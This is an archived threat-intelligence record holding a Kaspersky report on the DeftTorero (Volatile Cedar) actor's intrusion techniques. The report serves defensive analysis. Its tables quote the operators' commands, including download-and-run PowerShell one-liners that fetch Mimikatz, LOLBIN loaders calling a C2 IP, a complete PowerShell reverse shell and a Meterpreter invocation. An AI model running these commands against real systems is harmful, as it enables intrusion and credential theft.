{
	"id": "d319def0-f6c1-4fe2-98cd-cb98a6366115",
	"created_at": "2026-04-06T00:12:39.450903Z",
	"updated_at": "2026-04-10T03:31:32.865901Z",
	"deleted_at": null,
	"sha1_hash": "bb37f33f3495a1cf5949cd085ca8f958d88cfb38",
	"title": "DeftTorero: tactics, techniques and procedures of intrusions revealed",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 72597,
	"plain_text": "DeftTorero: tactics, techniques and procedures of intrusions\r\nrevealed\r\nBy GReAT\r\nPublished: 2022-10-03 · Archived: 2026-04-02 11:24:30 UTC\r\nEarlier this year, we started hunting for possible new DeftTorero (aka Lebanese Cedar, Volatile Cedar) artifacts.\r\nThis threat actor is believed to originate from the Middle East and was publicly disclosed to the cybersecurity\r\ncommunity as early as 2015. Notably, no other intelligence was shared until 2021, which led us to speculate on a\r\npossible shift by the threat actor to more fileless/LOLBINS techniques, and the use of known/common offensive\r\ntools publicly available on the internet that allows them to blend in.\r\nThe public reports available to date expose and discuss the final payload – Explosive RAT – and the webshells\r\nused in the initial foothold such as Caterpillar and ASPXSpy (you can find webshell MD5 hashes in the IoC\r\nsection), with little on the tactics, techniques and procedures (TTPs); this post focuses primarily on the TTPs used\r\nby the threat actor in intrusions between late 2019 and mid-2021 to compromise victims.\r\nMore information about DeftTorero is available to customers of Kaspersky Intelligence Reporting.\r\nContact us: intelreports@kaspersky.com\r\nInitial Access and webshell deployment\r\nDuring our intrusion analysis of DeftTorero’s webshells, such as Caterpillar, we noticed traces that infer the threat\r\nactor possibly exploited a file upload form and/or a command injection vulnerability in a functional or staging\r\nwebsite hosted on the target web server. This assumption is based on the fact that the uploaded webshells always\r\ndrop in the same web folder, and in some cases get assigned a name containing a GUID followed by the original\r\nwebshell filename.\r\nIn other instances, we noticed traces pointing to a possible exploitation of IIS PHP plugins pre-installed by the\r\nserver admins. 
And finally, in some other instances, we suspect the operators gained server credentials from other\r\nsystems in the same organization and logged in using a remote desktop (MSTSC.exe) to deploy the webshell.\r\nOnce the threat actor succeeds in identifying a method to upload a webshell, they attempt to drop several webshell\r\ntypes and families, most of which are blocked by the AV engine. We suspect that almost all the webshells dropped\r\n(including ASPXSpy, devilzshell, etc.) originate from a GitHub account, and are either used as is or are slightly\r\nmodified.\r\nDiscovery\r\nUpon successful installation of the webshell, the operators run multiple commands to gain situational awareness\r\nfrom the exploited system. This includes testing network connectivity by pinging Google.com, listing current\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 1 of 6\n\nfolders, identifying the current user privileges, enumerating local system users, and listing websites hosted by the\r\ncompromised server. 
The operators also attempt to assess if the web server is joined and/or trusted by any domain.\r\nAt a later stage, this will prove useful as it will inform them on the next course of actions for dumping local or\r\ndomain credentials.\r\nCommand Purpose\r\ncmd.exе /c whoаmi Identify user privileges\r\ncmd.exе /c аppcmd list site List the hosted websites on the web server\r\ncmd.exе /c nltеst\r\n/domain_trusts\r\nList domain controllers and enumerate domain trusts\r\ncmd.exе /с dir List current directories and files\r\ncmd.exе /c nеt view\r\nDisplay a list of domains, computers, or resources that are being shared by the\r\nspecified computer\r\ncmd.exе /c sеt Display the current environment variable settings\r\ncmd.exе /c systеminfo Display system profile and installed hotfixes\r\ncmd.exе /c ipconfig -\r\ndisplаydns\r\nDisplay DNS resolver cache\r\ncmd.exе /c ipconfig -аll Display network configuration on all network interfaces\r\ncmd.exе /c nеt user Display local users\r\ncmd.exе /c nеt user /domain Display domain users\r\ncmd.exе /c nеt use Display mapped drives to local system\r\ncmd.exе /c opеnfilеs Display files opened remotely\r\nTable. 1 Operator commands executed through webshell\r\nAfter gaining situational awareness, the operators attempt to load/invoke a number of tools to dump local and\r\ndomain credentials. In some cases, the threat actor attempts to install Nmap and Advanced Port Scanner, possibly\r\nto scan internal systems.\r\nDumping credentials\r\nCredential dumping methods differed from one case to another. In some instances, Lazagne.exe was used, in\r\nothers Mimikatz variants were used either by executing the respective PE binary or by invoking a base64-encoded\r\nPowerShell version from a GitHub project. 
In a smaller number of instances, possibly due to AV detection, the\r\noperators dumped the LSASS.exe process to disk, most probably to process it offline for credential dumping.\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 2 of 6\n\nCommand Comment\r\nIEX (New-Object\r\nNet.WebClient).DownloаdString(“httрs://raw.githubusercontеn\r\nt.com/BC-SECURITY/Empire/master/data/module_source/crеdentials/Invok\r\ne-Mimikatz.ps1”); Invoke-Mimikаtz -Command\r\nprivilеge::dеbug; Invoke-Mimikаtz -DumpCrеds;\r\nDecoded base64 command issued\r\nthrough webshell to invoke Mimikatz to\r\ndump passwords\r\nIEX (New-Object\r\nNet.WebClient).DownloаdString(‘httрs://raw.githubuserconten\r\nt.com/putterpаnda/mimikittеnz/master/Invoke-mimikittеnz.ps1’); Invoke-mimikittеnz\r\nDecoded base64 command issued\r\nthrough webshell to invoke Mimikittenz\r\nto dump passwords\r\nTable. 2 Operators invoking Mimikatz variants\r\nOnce credentials are obtained, it is believed the operators use Remote Desktop Protocol to pivot into internal\r\nsystems, or reachable systems that are likely using the stolen credentials (e.g., trusted partners). This is also\r\nreinforced by timeline analysis where the threat actor deployed a webshell at another web server in the same\r\nnetwork without exploiting a file upload form/vulnerability.\r\nThe many ways to achieve Execution\r\nFurther commands were executed to bypass the AV engine and establish a Meterpreter session with the operators’\r\nC2 server. After a Meterpreter session is established, the operators attempt to again invoke Mimikatz variants to\r\ngain system and/or domain credentials. 
It’s worth mentioning that in older intrusions, the threat actor deployed\r\nExplosive RAT instead of using Meterpreter.\r\nCommand Comment\r\ncmd.exе /c “regsvr32 /s /n /u /i:httр://200.159.87[.]196:3306/jsJ13j.sct\r\nscrobj.dll 2\u003e\u00261\r\nAlternative methods to\r\nachieve command execution\r\nwhile bypassing security\r\ncontrols using LOLBINs\r\nsuch as REGSVR32 and\r\nMSIEXEC\r\ncmd.exе /c “powershell -command “regsvr32 /s /n /u\r\n/i:httр://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll” 2\u003e\u00261\r\ncmd.exе /c “powershеll.exe -executionpolicy bypass -w hidden “iex(New-Object\r\nSystem.Net.WebClient).DownloadString(‘httр://200.159.87[.]196/made.ps1’)\r\n; made.ps1” 2\u003e\u00261\r\ncmd.exе /c “powershеll.exe -c “(New-Object\r\nSystem.NET.WеbClient).DownloadFile(‘httр://200.159.87[.]196/av.vbs’,\\”$e\r\nnv:temp\\av.vbs\\”);Start-Procеss %windir%\\system32\\cscript.exе\r\n\\”$env:temp\\av.vbs\\”” 2\u003e\u00261\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 3 of 6\n\ncmd.exe /c “powershеll.exe -executionpolicy bypass -w hidden “iex(New-Object\r\nSystem.Net.WebClient).DownloadString(‘httр://\u003cinternal_IP_address\u003e:8000/\r\nmade.ps1′); made.ps1″ 2\u003e\u00261\r\ncmd.exe /c “powershеll -nop -c “$client = New-Object\r\nSystem.Net.Sockets.TCPClient(‘200.159.87[.]196’,3306);$strеam =\r\n$client.GеtStream();[byte[]]$bytes = 0..65535|%{0};while(($i =\r\n$stream.Rеad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object –\r\nTypeName System.Text.ASCIIEncoding).GеtString($bytes,0, $i);$sendback\r\n=\r\n(iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + ‘PS ‘ +\r\n(pwd).Path + ‘\u003e ‘;$sеndbyte =\r\n([text.encoding]::ASCII).GеtBytes($sendback2);$strеam.Write($sendbyte,0,\r\n$sendbyte.Length);$stream.Flush()};$client.Close()” 2\u003e\u00261\r\ncmd.exe /c “msiеxec /q /i http://200.159.87[.]196/1.msi 2\u003e\u00261\r\ncmd.exe /c “Powershеll.exе -NoP -NonI -W Hidden -Exеc Bypass IEX 
(New-Object\r\nNet.WebClient).DownloadString(‘httрs://raw.githubusercontent[.]com/cheet\r\nz/PowerSploit/master/CodeExеcution/Invoke–Shellcode.ps1’); Invoke-Shellcode -Payload windows/metеrpreter/reverse_https -Lhost\r\n200.159.87[.]196 -Lport 3306 -Force 2\u003e\u00261\r\nPowerShell command to\r\ninvoke a Meterpreter session\r\nTable. 3 Operator commands to establish further presence on other servers in the same network\r\nCredentials: the more, the better\r\nWhile the same credential dumping strategy has been used by the operators in most intrusions, there were some\r\ninstances where few modifications were seen. For example, the operators used the VSSADMIN system tool to\r\ncreate a shadow copy snapshot on the targeted server in an attempt to dump domain credentials, a technique also\r\nused in pentesting and red team engagement.\r\nCommand Comment\r\nCMD /C vssаdmin create\r\nshadow /for=E:\r\nCreate a volume shadow copy to collect SAM and SYSTEM registry hives from\r\nlocal system, or NTDS.DIT and SYSTEM hives if on a domain controller\r\nCMD /C vssаdmin list\r\nshadows /for=E:\u003e\r\nTest if the above command worked\r\nTable. 4 Creating a shadow copy\r\nDefense Evasion: Explosive RAT modifications\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 4 of 6\n\nWe’ve barely seen Explosive RAT since 2019. However, it’s worth mentioning the tricks the author used in the\r\nversions that we know of. While the functionality of the malware didn’t change that much over time, the author\r\nmade an effort to ensure its files wouldn’t be detected using publicly available signatures. The changes introduced\r\nwere minimal but sufficient. The table below illustrates some changes made by the malware author. 
It is also\r\nnoticeable that some strings mentioned in previous Yara rules disappeared from the newer version.\r\nNew Pattern Old Pattern Pattern Description\r\nDOD DLD\r\nDelimiter used for malware\r\nconfiguration variables\r\nMozilla/5.0 (Windows NT 6.0;\r\nWOW64; rv:32.0) Gecko/20200101\r\nFirefox/32.0\r\nMozilla/4.0 (compatible; MSIE 7.0;\r\nMSIE 6.0; Windows NT 5.1; .NET\r\nCLR 2.0.50727)\r\nUser Agent for HTTP\r\nCommunication\r\nTable. 5 Pattern changes in the newer Explosive RAT campaign\r\nA second noticeable change made to evade defense was introduced to the function names exported by the DLL\r\ncomponent of Explosive RAT. Below is a list of changes in the export table.\r\nNew Function Name Old Function Name\r\nAllDataGet GetAllData\r\nHistoryGetIE GetIEHistory\r\nTOCN CON\r\nFnClipOpen OpenClipFn\r\nHoKSetWin SetWinHoK\r\nappregister Registerapp\r\nProcessPath PathProcess\r\nTable. 6 New function names compared to the old ones used in the 2015 campaign\r\nVictims\r\nBased on our telemetry, the indicators of the intrusions we assessed between late 2019 and mid-2021 are similar to\r\nthe usual DeftTorero victimology, with a clear focus on Middle Eastern countries such as Egypt, Jordan, Kuwait,\r\nLebanon, Saudi Arabia, Turkey and the United Arab Emirates.\r\nThe targeted web servers occasionally host multiple websites belonging to different industry verticals such as\r\nCorporate, Education, Government, Military, Media, and Telcos. This presents the threat actor with the\r\nopportunity to pivot to other victims of interest.\r\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\r\nPage 5 of 6\n\nConclusions\r\nIn this post, we described the potential tactics, techniques and procedures identified in previous DeftTorero\r\nintrusions that were largely missing from public reports. 
As our telemetry and public reports did not identify any\r\nnew Explosive RAT detections after 2020, but only old, slightly modified toolsets (e.g., Explosive RAT, webshells,\r\netc.), the historical intrusion analysis we conducted suggests a potential TTP shift by the threat actor to more\r\nfileless/LOLBINS techniques, and the use of known/common offensive tools available on the internet. This TTP\r\nshift could explain the detection gap in previous years, because using fileless techniques and public tools allows\r\nthe operators to blend in with other threat activities.\r\nThere are two recommended defensive measures to combat such intrusions, aside from assessing web\r\nvulnerabilities, namely monitoring web server file integrity and occasionally scanning web server backups; we\r\nhave noticed that some of the threat actor's post-exploitation tools were actually inside website backups, and\r\ncontinued to exist after the initial intrusion. If the backups were restored at a later stage, the threat actor could\r\nregain persistent access and continue where they left off.\r\nIf you want to learn more about DeftTorero activity and defense against this group, contact the Kaspersky\r\nIntelligence Reporting service at intelreports@kaspersky.com.\r\nIndicators of Compromise\r\nNote: We provide an incomplete list of IoCs here that are valid at the time of publication. A full IoC list is\r\navailable in our private report.\r\nFile hashes\r\nPost exploitation\r\nSource: https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
	],
	"report_names": [
		"107610"
	],
	"threat_actors": [
		{
			"id": "bc5c22a8-29eb-4a87-acd6-4817060e80f2",
			"created_at": "2022-10-25T15:50:23.658256Z",
			"updated_at": "2026-04-10T02:00:05.38013Z",
			"deleted_at": null,
			"main_name": "Volatile Cedar",
			"aliases": [
				"Volatile Cedar",
				"Lebanese Cedar"
			],
			"source_name": "MITRE:Volatile Cedar",
			"tools": [
				"Caterpillar WebShell"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "17b152bc-6f7e-463c-8b4c-a4844caea6df",
			"created_at": "2023-01-06T13:46:38.498795Z",
			"updated_at": "2026-04-10T02:00:03.000373Z",
			"deleted_at": null,
			"main_name": "Volatile Cedar",
			"aliases": [
				"Lebanese Cedar",
				"DeftTorero"
			],
			"source_name": "MISPGALAXY:Volatile Cedar",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5e7c75c6-097f-4d80-8c98-73485fe2a729",
			"created_at": "2022-10-25T16:07:24.386715Z",
			"updated_at": "2026-04-10T02:00:04.970172Z",
			"deleted_at": null,
			"main_name": "Volatile Cedar",
			"aliases": [
				"Amethyst Rain",
				"Dancing Salome",
				"DeftTorero",
				"G0123",
				"VolcanicTimber"
			],
			"source_name": "ETDA:Volatile Cedar",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Adminer",
				"DirBuster",
				"GoBuster",
				"JuicyPotato",
				"RottenPotato",
				"SharPyShell"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434359,
	"ts_updated_at": 1775791892,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb37f33f3495a1cf5949cd085ca8f958d88cfb38.pdf",
		"text": "https://archive.orkl.eu/bb37f33f3495a1cf5949cd085ca8f958d88cfb38.txt",
		"img": "https://archive.orkl.eu/bb37f33f3495a1cf5949cd085ca8f958d88cfb38.jpg"
	}
}